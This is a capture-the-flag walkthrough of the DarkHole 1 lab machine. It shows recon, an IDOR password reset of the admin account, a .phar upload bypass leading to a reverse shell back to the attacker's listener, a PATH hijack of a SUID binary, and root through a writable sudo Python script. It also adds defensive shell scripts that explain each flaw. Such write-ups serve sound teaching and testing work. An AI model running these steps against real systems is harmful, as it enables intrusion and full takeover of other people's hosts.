Darkhole 1
Port recognition with nmap
┌──(root@ghost)-[/home/ghost]
└─# nmap -v -p- --open --min-rate 5000 darkhole.vuln -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-28 10:00 EST
NSE: Loaded 45 scripts for scanning.
Initiating ARP Ping Scan at 10:00
Scanning darkhole.vuln (10.0.2.54) [1 port]
Completed ARP Ping Scan at 10:00, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:00
Scanning darkhole.vuln (10.0.2.54) [65535 ports]
Discovered open port 22/tcp on 10.0.2.54
Discovered open port 80/tcp on 10.0.2.54
Completed SYN Stealth Scan at 10:00, 1.49s elapsed (65535 total ports)
Nmap scan report for darkhole.vuln (10.0.2.54)
Host is up (0.000062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 08:00:27:7D:63:F8 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
nmap reports only two open ports: 22 (OpenSSH 8.2p1) and 80 (Apache httpd 2.4.41). No NSE scripts were run, so everything below comes from the web application itself.
┌──(root@ghost)-[/home/ghost]
└─# whatweb http://darkhole.vuln
http://darkhole.vuln [200 OK] Apache[2.4.41], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.0.2.54], Title[DarkHole]
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -z list,php-html-txt --hc=404 http://darkhole.vuln/FUZZ.FUZ2Z
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://darkhole.vuln/FUZZ.FUZ2Z
Total requests: 661638
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 28 L 45 W 810 Ch "index - php"
000000151: 200 55 L 213 W 2886 Ch "register - php"
000003631: 302 0 L 0 W 0 Ch "logout - php"
000000115: 200 49 L 197 W 2507 Ch "login - php"
000008737: 200 0 L 4 W 21 Ch "dashboard - php"
Fuzzing the web server turns up register.php, login.php, logout.php and dashboard.php, so we start by registering an account.

Register here

After logging in with our new account we are redirected to this dashboard. Looking at the URL, the dashboard is selected by an id parameter; changing id=2 to id=1 returns the error 'Your Not Allowed To Access another user information', so the read path does check that the id belongs to the logged-in session. We should open Burp Suite to see what the other requests on the page look like.

As we can see, when we click the Change button and intercept the request, the form submits a password parameter together with an id parameter, which is 2 (our own user).

Now we set id=1, click Forward, and the response says 'Password Has been Updated'. The ownership check that protected the dashboard view was never applied to the password update, so any authenticated user can overwrite any other user's password by changing one number: a classic IDOR / broken access control.

We guess that user id=1 is admin and try to log in with the password we just set.

Success. The admin dashboard has a file upload; trying a .php file gives 'Sorry , Allow Ex : jpg,png,gif'. At this point we could fuzz for the extensions the filter really accepts, but simply renaming the file to .phar works: the message reads like an allowlist, yet the filter behaves like a denylist of .php. That matters because the stock Debian/Ubuntu php module config hands every file matching `.+\.ph(ar|p|tml)$` to the PHP handler, so .phar (and .phtml) are executed by Apache just like .php.
┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.0.2.43 1337 > r.phar
Generating reverse shell with ShellStorm
┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.43] from darkhole.vuln [10.0.2.54] 55798
Linux darkhole 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
17:37:47 up 3:00, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
After uploading the .phar file we start the listener first, then visit or curl http://darkhole.vuln/upload/r.phar, and we are inside as www-data.
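The interaction between the upload filter and Apache's PHP handler, as an added example that is not part of the original walkthrough. Two things are assumptions of mine, not facts shown on the page: that the application's filter is a denylist which blocks only `.php` (the page only shows the error message and that `.phar` got through), and that the server uses the Debian/Ubuntu stock php module config, whose handler line is `<FilesMatch ".+\.ph(ar|p|tml)$">`. The script models both checks and shows which names slip past the filter but are still executed, and contrasts the filter with a strict allowlist matching the message the app prints.

```shell
#!/bin/sh
# Added example: which upload names does the (assumed) denylist accept, and
# which of those would Apache's PHP handler still execute?

# Assumed model of the app's filter: a denylist that rejects only ".php".
upload_filter_accepts() {
    case "$(printf '%s' "$1" | tr 'A-Z' 'a-z')" in
        *.php) return 1 ;;
        *)     return 0 ;;
    esac
}

# The FilesMatch regex from Debian/Ubuntu's php module config, applied to the
# requested filename (Apache's FilesMatch is case-sensitive by default).
apache_executes_as_php() {
    printf '%s\n' "$1" | grep -Eq '.+\.ph(ar|p|tml)$'
}

# A strict allowlist that actually matches the message 'Allow Ex : jpg,png,gif'.
allowlist_accepts() {
    case "$(printf '%s' "$1" | tr 'A-Z' 'a-z')" in
        *.jpg|*.png|*.gif) return 0 ;;
        *)                 return 1 ;;
    esac
}

# BLOCKED: filter rejects it; STORED: saved but served as data;
# EXEC: saved AND run by the PHP handler, i.e. a webshell.
classify() {
    if ! upload_filter_accepts "$1"; then echo BLOCKED; return 0; fi
    if apache_executes_as_php "$1"; then echo EXEC; else echo STORED; fi
}

for name in shell.php r.phar x.phtml pic.jpg; do
    printf '%-10s denylist:%-8s allowlist:%s\n' "$name" "$(classify "$name")" \
        "$(allowlist_accepts "$name" && echo accept || echo reject)"
done
```

The takeaway is the one the walkthrough demonstrates empirically: with a denylist, every extension the handler regex matches but the list omits is a remote code execution path, whereas an allowlist of image extensions never reaches the handler at all.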
www-data@darkhole:/home/john$ ls -la
total 72
drwxrwxrwx 5 john john 4096 Dec 28 17:43 .
drwxr-xr-x 4 root root 4096 Jul 16 2021 ..
-rw------- 1 john john 1842 Dec 28 14:37 .bash_history
-rw-r--r-- 1 john john 220 Jul 16 2021 .bash_logout
-rw-r--r-- 1 john john 3771 Jul 16 2021 .bashrc
drwx------ 2 john john 4096 Jul 17 2021 .cache
drwxrwxr-x 3 john john 4096 Jul 17 2021 .local
-rw------- 1 john john 37 Jul 17 2021 .mysql_history
-rw-r--r-- 1 john john 807 Jul 16 2021 .profile
drwxrwx--- 2 john www-data 4096 Jul 17 2021 .ssh
-rwxrwx--- 1 john john 1 Jul 17 14:37 file.py
-rwxrwx--- 1 john john 8 Jul 17 2021 password
-rwsr-xr-x 1 root root 16784 Jul 17 2021 toto
-rw-rw---- 1 john john 24 Jul 17 2021 user.txt
Searching the whole system for a way to escalate from www-data to john, the home directory is world-writable and contains a SUID-root binary, toto, that www-data can execute.
www-data@darkhole:/home/john$ ./toto
uid=1001(john) gid=33(www-data) groups=33(www-data)
It prints output just like the id command, but with uid=1001(john): the binary drops from root to john and then runs a command.
www-data@darkhole:/home/john$ strings toto
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
...
We can see setuid, setgid and system among the imports of a SUID binary. system() runs its argument through /bin/sh, so if the command is given by a bare name ("id" rather than "/usr/bin/id") the shell resolves it through PATH, which we control. We place our own id first in PATH.
www-data@darkhole:/home/john$ cd /tmp
www-data@darkhole:/tmp$ echo '/bin/bash' > id
www-data@darkhole:/tmp$ chmod +x id
www-data@darkhole:/tmp$ export PATH=/tmp:$PATH
www-data@darkhole:/tmp$ cd /home/john
www-data@darkhole:/home/john$ ./toto
john@darkhole:/home/john$ cat user.txt
DarkHole{You_Can_DO_It}
And now we are john: toto called setuid(john) and then system("id"), and our fake id in /tmp was found before /usr/bin/id.
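The PATH hijack used against toto, reproduced as an added example that is not code from the original page. It needs no SUID binary: a shell function plays the part of toto's system("id") call (the exact string passed to system() is my assumption, inferred from the binary's id-like output), a fake id is planted in a temporary directory that is prepended to PATH, and the result is compared with the hardened variant that calls the binary by absolute path.

```shell
#!/bin/sh
# Added example: why system("id") in a privileged binary is hijackable via
# PATH, and why system("/usr/bin/id") is not.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Stand-ins for toto's system() call: system() passes the string to /bin/sh -c,
# which looks a bare command name up in PATH.
run_like_toto() { /bin/sh -c 'id'; }            # relative name: hijackable
run_hardened()  { /bin/sh -c '/usr/bin/id'; }   # absolute path: not hijackable

# Attacker-controlled "id" that announces itself instead of calling the real one.
plant_fake_id() {
    printf '#!/bin/sh\necho HIJACKED\n' > "$WORK/id"
    chmod +x "$WORK/id"
}

# Runs the given function with the attacker's directory first in PATH and
# reports "HIJACKED" if the planted binary ran, "real" otherwise.
outcome() {
    out=$(export PATH="$WORK:$PATH"; "$1" 2>/dev/null) || true
    case "$out" in
        HIJACKED*) echo HIJACKED ;;
        *)         echo real ;;
    esac
}

plant_fake_id
echo "system(\"id\")          -> $(outcome run_like_toto)"
echo "system(\"/usr/bin/id\") -> $(outcome run_hardened)"
```

The PATH change is made inside a command substitution, so it never leaks into the calling shell; in the real attack the author exported it in the www-data shell before running ./toto. Note that privileged programs should also clear or reset the environment rather than rely on the caller's, since PATH is only one of several variables /bin/sh honours.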
john@darkhole:/home/john$ cat password
root123
john@darkhole:/home/john$ sudo -l
[sudo] password for john:
Matching Defaults entries for john on darkhole:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on darkhole:
(root) /usr/bin/python3 /home/john/file.py
john@darkhole:/home/john$
Well, time to get root. The sudo rule runs /home/john/file.py as root with python3, but file.py is owned by john with mode rwxrwx---, so john can put whatever he likes in it.
john@darkhole:/home/john$ printf "import os\nos.system('/bin/bash')\n" > file.py && sudo -u root /usr/bin/python3 /home/john/file.py
root@darkhole:/home/john# cat /root/root.txt
DarkHole{You_Are_Legend}
And we are root. The rule would only have been safe if file.py (and its directory) were writable by root alone.
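A check for the misconfiguration exploited in the last step, as an added example that is not from the original walkthrough: a small parser for `sudo -l` output that lists every absolute path on a rule line the current user can write to. The `sudo -l` text is constructed to mirror the page's output, with the rule's target replaced by a temporary file so the script runs anywhere; the function itself reads real `sudo -l` output from stdin.

```shell
#!/bin/sh
# Added example: find sudo rules whose script or argument is writable by us.

# Reads `sudo -l` output on stdin. Only rule lines (those containing "(user)")
# are inspected, so the Defaults/secure_path line is skipped; every absolute
# path on a rule line is tested with -w and printed if writable.
writable_sudo_targets() {
    while IFS= read -r line; do
        case "$line" in
            *\(*\)*) ;;        # e.g. "(root) /usr/bin/python3 /home/john/file.py"
            *) continue ;;
        esac
        for word in $line; do
            case "$word" in
                /*) [ -w "$word" ] && printf '%s\n' "$word" ;;
            esac
        done
    done
    return 0
}

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
touch "$WORK/file.py"   # constructed stand-in for /home/john/file.py (john-owned)

# Constructed sample modelled on the sudo -l output shown in the walkthrough.
sample_sudo_l() {
    cat <<EOF
Matching Defaults entries for john on darkhole:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on darkhole:
    (root) /usr/bin/python3 $WORK/file.py
EOF
}

sample_sudo_l | writable_sudo_targets
```

On a real host run it as `sudo -l | sh -c '. ./check.sh; writable_sudo_targets'` or paste the function into the shell; any path it prints is a root shell away, exactly as file.py was here. It does not catch writable parent directories or interpreters that honour environment variables, so treat a clean result as necessary rather than sufficient.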